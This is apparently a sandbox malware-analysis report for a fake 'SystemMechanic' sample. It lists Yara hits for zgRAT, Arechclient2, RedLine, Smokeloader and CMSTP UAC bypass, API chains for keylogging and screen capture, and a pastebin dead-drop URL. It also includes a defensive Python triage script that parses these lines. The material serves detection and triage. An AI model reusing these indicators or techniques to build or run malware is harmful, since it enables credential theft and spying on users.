Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 185.93.1.243:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_0020C8B0 GetClientRect,GetDC,CreateCompatibleBitmap,GetDC,CreateCompatibleDC,BitBlt, 3_2_0020C8B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_6C72A5AA GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState, 3_2_6C72A5AA

System Summary

Source: 3.2.run.exe.410ed5b.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 4.2.cmd.exe.5b000c8.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 24.2.cmd.exe.556c264.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.run.exe.40ca86d.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 22.2.run.exe.3903d5b.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.5b600c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 4.2.cmd.exe.515de64.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.5b600c8.7.unpack, type: UNPACKEDPE Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 22.2.run.exe.38bf86d.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.MSBuild.exe.1200000.0.unpack, type: UNPACKEDPE Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 4.2.cmd.exe.5119976.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.556ce64.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 22.2.run.exe.390315b.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 4.2.cmd.exe.5b000c8.8.unpack, type: UNPACKEDPE Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 4.2.cmd.exe.515d264.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.run.exe.410e15b.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21729406ca8.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 24.2.cmd.exe.5528976.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171726d525.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171729432f.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f3537d.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f54dad.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217172b8739.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f447a3.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000002.00000002.2530199003.0000000001A44000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2424325171.0000000003670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2424005663.0000000001CE5000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000002.00000002.2530861686.0000000003500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: C:\Users\user\AppData\Local\Temp\jipsoiol, type: DROPPED Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\dvffdl, type: DROPPED Matched rule: Detects Arechclient2 RAT Author: ditekSHen
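The string hits, API-chain hits and Yara hits above are raw sandbox output, and most of the URLs are noise: Application Insights, Newtonsoft.Json, font licences, CA policy pointers and browser search defaults are embedded by legitimate libraries in the binaries, and many entries are the same string with a few adjacent bytes appended (z9pYkqPQ versus z9pYkqPQPO). What matters for triage is the per-process picture: the pastebin raw URL sitting in MSBuild.exe memory (the process the Arechclient2 Yara rule fires on) fits the dead-drop-resolver pattern, and the two run.exe API chains are GDI screen capture and polled GetAsyncKeyState keystroke capture. The script below, an added example and not part of the Joe Sandbox report or its tooling, parses lines in exactly these three shapes, collapses trailing-byte duplicates, groups URLs per process, flags dead-drop hosts and tags the API chains. The line regexes, the benign-host allowlist, the dead-drop host list and the GetAsyncKeyState threshold are my assumptions; the sample lines are constructed copies of entries from this section.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit

# Constructed sample: lines copied in shape from the report section above.
SAMPLE_LINES = r"""
Source: MSBuild.exe, 0000001C.00000002.2878041510.00000000031E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com/raw/z9pYkqPQ
Source: MSBuild.exe, 0000001C.00000002.2878041510.00000000031E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com/raw/z9pYkqPQPO
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://dc.services.visualstudio.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://dc.services.visualstudio.com/v2/track
Source: u2ts.0.exe, 00000002.00000003.2074203635.0000000001AEA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3264269793.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_0020C8B0 GetClientRect,GetDC,CreateCompatibleBitmap,GetDC,CreateCompatibleDC,BitBlt, 3_2_0020C8B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_6C72A5AA GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState, 3_2_6C72A5AA
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_00427880 0_2_00427880
Source: 4.2.cmd.exe.5b000c8.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 28.2.MSBuild.exe.1200000.0.unpack, type: UNPACKEDPE Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 00000002.00000002.2530199003.0000000001A44000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
"""

# Assumed line shapes (mine), one per hit type seen in the report.
STRING_RE = re.compile(r"^Source: (?P<src>.+?) String found in binary or memory: (?P<url>\S+)$")
FUNC_RE = re.compile(r"^Source: (?P<src>.+?) Code function: (?P<fn>\S+) (?P<apis>(?:\w+,)+) \S+$")
YARA_RE = re.compile(r"^Source: (?P<src>.+?), type: (?P<kind>\S+) Matched rule: (?P<rule>.+?) Author: (?P<author>\S+)$")

# Assumed allowlist (mine): hosts embedded by legitimate SDKs, fonts, CA/CPS
# pointers and browser defaults. Presence alone says nothing about intent.
BENIGN_HOST_SUFFIXES = (
    "services.visualstudio.com", "monitor.azure.com", "applicationinsights.azure.com",
    "github.com", "newtonsoft.com", "nuget.org", "scripts.sil.org", "mozilla.org",
    "duckduckgo.com", "google.com", "ecosia.org", "search.yahoo.com",
    "digicert.com", "sectigo.com", "symcb.com",
)
# Assumed dead-drop resolvers (mine): paste sites that hand a client its real C2.
DEAD_DROP_HOSTS = ("pastebin.com",)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def processes(src: str) -> list[str]:
    """Process/file names in a Source field, minus the memory-dump identifiers."""
    return [basename(p) for p in src.split(", ") if not p.endswith(".sdmp")]


def host_matches(host: str, suffixes) -> bool:
    return any(host == s or host.endswith("." + s) for s in suffixes)


def classify_url(url: str) -> str:
    host = urlsplit(url).hostname or ""
    if host_matches(host, DEAD_DROP_HOSTS):
        return "dead-drop"
    if host_matches(host, BENIGN_HOST_SUFFIXES):
        return "benign-infra"
    return "review"


def dedupe_urls(urls) -> list[str]:
    """Drop a URL that is another URL plus trailing bytes within the same path
    segment (the memory scraper read past the terminator); a genuine sub-path
    or query (extra '/' or '?') is kept as a distinct URL."""
    kept: list[str] = []
    for u in sorted(set(urls), key=lambda s: (len(s), s)):
        trailing_junk = any(
            u.startswith(k) and not any(c in u[len(k):] for c in "/?") for k in kept
        )
        if not trailing_junk:
            kept.append(u)
    return kept


def tag_api_chain(apis: list[str]) -> list[str]:
    """Behaviour tags for the two chain patterns in the report; threshold is assumed."""
    tags = []
    if {"CreateCompatibleBitmap", "BitBlt"} <= set(apis):
        tags.append("screen-capture")          # GDI copy of a window/screen into a bitmap
    if apis.count("GetAsyncKeyState") >= 2:
        tags.append("keystroke-polling")       # repeated key-state polling, i.e. keylogging
    return tags


def triage(text: str) -> dict:
    urls_by_proc: dict[str, set[str]] = defaultdict(set)
    chains, yara = [], Counter()
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if (m := STRING_RE.match(line)):
            for p in processes(m["src"]):
                urls_by_proc[p].add(m["url"])
        elif (m := FUNC_RE.match(line)):
            apis = m["apis"].rstrip(",").split(",")
            chains.append({"process": basename(m["src"]), "function": m["fn"],
                           "apis": apis, "tags": tag_api_chain(apis)})
        elif (m := YARA_RE.match(line)):
            yara[m["rule"]] += 1
    urls = {p: dedupe_urls(us) for p, us in urls_by_proc.items()}
    flagged = sorted((p, u) for p, us in urls.items() for u in us
                     if classify_url(u) == "dead-drop")
    return {"urls": urls, "flagged": flagged, "chains": chains, "yara": dict(yara)}


if __name__ == "__main__":
    result = triage(SAMPLE_LINES)
    for proc, us in sorted(result["urls"].items()):
        print(proc, [(u, classify_url(u)) for u in us])
    print("flagged:", result["flagged"])
    for c in result["chains"]:
        print(c["process"], c["function"], c["tags"])
    print("yara:", result["yara"])
```

The prefix collapse is deliberately narrow: it only drops a candidate when the extra bytes stay inside one path segment, so https://dc.services.visualstudio.com/v2/track survives next to https://dc.services.visualstudio.com/ while https://dc.services.visualstudio.com/f does not. Anything classified "review" (iolo, azurewebsites, the decimal hosts) still needs a human look; the allowlist only removes what is explained by the embedded libraries.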
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_00427880 0_2_00427880
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0040B8AE 0_2_0040B8AE
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0040C191 0_2_0040C191
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_004123A0 0_2_004123A0
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0040F441 0_2_0040F441
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0040C44C 0_2_0040C44C
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0042140C 0_2_0042140C
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0040BC20 0_2_0040BC20
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0041BE39 0_2_0041BE39
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0040BECA 0_2_0040BECA
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_00408761 0_2_00408761
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0041B722 0_2_0041B722
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0040C7FC 0_2_0040C7FC
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0367BB15 0_2_0367BB15
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0367C3F8 0_2_0367C3F8
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0367CA63 0_2_0367CA63
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_03697AE7 0_2_03697AE7
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0367C131 0_2_0367C131
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_036789C8 0_2_036789C8
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0368B989 0_2_0368B989
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_03682607 0_2_03682607
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0367F6A8 0_2_0367F6A8
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0367C6B3 0_2_0367C6B3
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0367BE87 0_2_0367BE87
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD06BE0 2_2_6BD06BE0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCA0BA0 2_2_6BCA0BA0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC08BAC 2_2_6BC08BAC
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC7EA80 2_2_6BC7EA80
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC7CA70 2_2_6BC7CA70
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCAEA00 2_2_6BCAEA00
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCB8A30 2_2_6BCB8A30
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD1C9E0 2_2_6BD1C9E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC349F0 2_2_6BC349F0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC909A0 2_2_6BC909A0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCBA9A0 2_2_6BCBA9A0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCC09B0 2_2_6BCC09B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC38960 2_2_6BC38960
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC56900 2_2_6BC56900
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCEC8C0 2_2_6BCEC8C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD068E0 2_2_6BD068E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCD4840 2_2_6BCD4840
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC50820 2_2_6BC50820
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC8A820 2_2_6BC8A820
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC00FE0 2_2_6BC00FE0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCDEFF0 2_2_6BCDEFF0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD48FB0 2_2_6BD48FB0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC0EFB0 2_2_6BC0EFB0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC6EF40 2_2_6BC6EF40
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCC2F70 2_2_6BCC2F70
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC06F10 2_2_6BC06F10
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD40F20 2_2_6BD40F20
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC0AEC0 2_2_6BC0AEC0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCA0EC0 2_2_6BCA0EC0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC86E90 2_2_6BC86E90
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC9EE70 2_2_6BC9EE70
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCE0E20 2_2_6BCE0E20
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD8CDC0 2_2_6BD8CDC0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC96D90 2_2_6BC96D90
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC04DB0 2_2_6BC04DB0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD2AD50 2_2_6BD2AD50
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCCED70 2_2_6BCCED70
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD88D20 2_2_6BD88D20
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC5ECD0 2_2_6BC5ECD0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BBFECC0 2_2_6BBFECC0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC0AC60 2_2_6BC0AC60
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCC6C00 2_2_6BCC6C00
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCDAC30 2_2_6BCDAC30
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC543E0 2_2_6BC543E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC323A0 2_2_6BC323A0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC5E3B0 2_2_6BC5E3B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC08340 2_2_6BC08340
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD42370 2_2_6BD42370
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC02370 2_2_6BC02370
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD1C360 2_2_6BD1C360
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC96370 2_2_6BC96370
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC72320 2_2_6BC72320
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD862C0 2_2_6BD862C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCD22A0 2_2_6BCD22A0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCCE2B0 2_2_6BCCE2B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC98250 2_2_6BC98250
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC88260 2_2_6BC88260
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCCA210 2_2_6BCCA210
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCD8220 2_2_6BCD8220
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC001E0 2_2_6BC001E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC68140 2_2_6BC68140
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC76130 2_2_6BC76130
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCE4130 2_2_6BCE4130
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BBF8090 2_2_6BBF8090
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC100B0 2_2_6BC100B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCDC0B0 2_2_6BCDC0B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC4E070 2_2_6BC4E070
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCCC000 2_2_6BCCC000
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCC8010 2_2_6BCC8010
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC2A7D0 2_2_6BC2A7D0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC80700 2_2_6BC80700
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC246D0 2_2_6BC246D0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC5E6E0 2_2_6BC5E6E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC9E6E0 2_2_6BC9E6E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC5C650 2_2_6BC5C650
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BBF45B0 2_2_6BBF45B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCCA5E0 2_2_6BCCA5E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC8E5F0 2_2_6BC8E5F0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD48550 2_2_6BD48550
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC58540 2_2_6BC58540
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD04540 2_2_6BD04540
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC62560 2_2_6BC62560
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCA0570 2_2_6BCA0570
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC464D0 2_2_6BC464D0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC9A4D0 2_2_6BC9A4D0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD2A480 2_2_6BD2A480
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC18460 2_2_6BC18460
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC64420 2_2_6BC64420
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC8A430 2_2_6BC8A430
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC47BF0 2_2_6BC47BF0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BBF1B80 2_2_6BBF1B80
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCE5B90 2_2_6BCE5B90
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC59BA0 2_2_6BC59BA0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCC9BB0 2_2_6BCC9BB0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCDFB60 2_2_6BCDFB60
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC4BB20 2_2_6BC4BB20
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC01AE0 2_2_6BC01AE0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCDDAB0 2_2_6BCDDAB0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD89A50 2_2_6BD89A50
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC3FA10 2_2_6BC3FA10
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCA1A10 2_2_6BCA1A10
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BCFDA30 2_2_6BCFDA30
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC999C0 2_2_6BC999C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC399D0 2_2_6BC399D0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC659F0 2_2_6BC659F0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC979F0 2_2_6BC979F0
